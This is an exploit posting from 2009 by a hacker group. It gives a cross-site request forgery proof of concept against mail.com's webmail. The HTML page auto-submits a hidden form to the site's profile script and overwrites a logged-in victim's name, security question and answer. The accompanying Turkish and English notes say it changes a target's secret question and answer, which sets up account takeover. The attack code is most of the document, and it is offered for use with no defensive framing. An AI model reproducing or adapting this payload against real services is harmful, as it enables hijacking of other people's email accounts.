mailcom-xsrf.txt
Posted on 20 February 2009
___________________________________________________________________________ |Site [Mail System]: http://mail.com | | Author: S1B3RK4N | | Email: s1b3rk4n[at]gmail[dot]com | |__________________________________________________________________________ Exploit Code : <html><body> <form name="profileform" method="post" action="http://mail01.mail.com/scripts/common/profile.cgi" onSubmit="return checkFields()"> <input name="first_name" size="30" maxlength="30" value="Isim" class="sb"> <input name="last_name" size="30" maxlength="30" value="Soyisim" class="sb"> <input name="hint_q" size="28" maxlength="48" value="Gizli_Soru" class="sb"> <input name="hint_a" size="28" maxlength="48" value="Gizli CEvap" class="sb"> <script> document.forms[0].submit() </script> </form> </body></html> NOT=Arkadaslar bu exploit ile hedef kisinin adini,soyadini,gizli sorusunu ve cevabini deistirebilirsiniz.... NOTE=Hi bro's...You can change name,surname,hint question and answer with this exploit... _____________TurKisH PoWeR_____________ _____________StoP IsRaeL , Nomassacre_____________ ________________________________________ www.CyberGrup.oRg www.CryptoSuite.org www.Hyper-Active.org ________________________________________
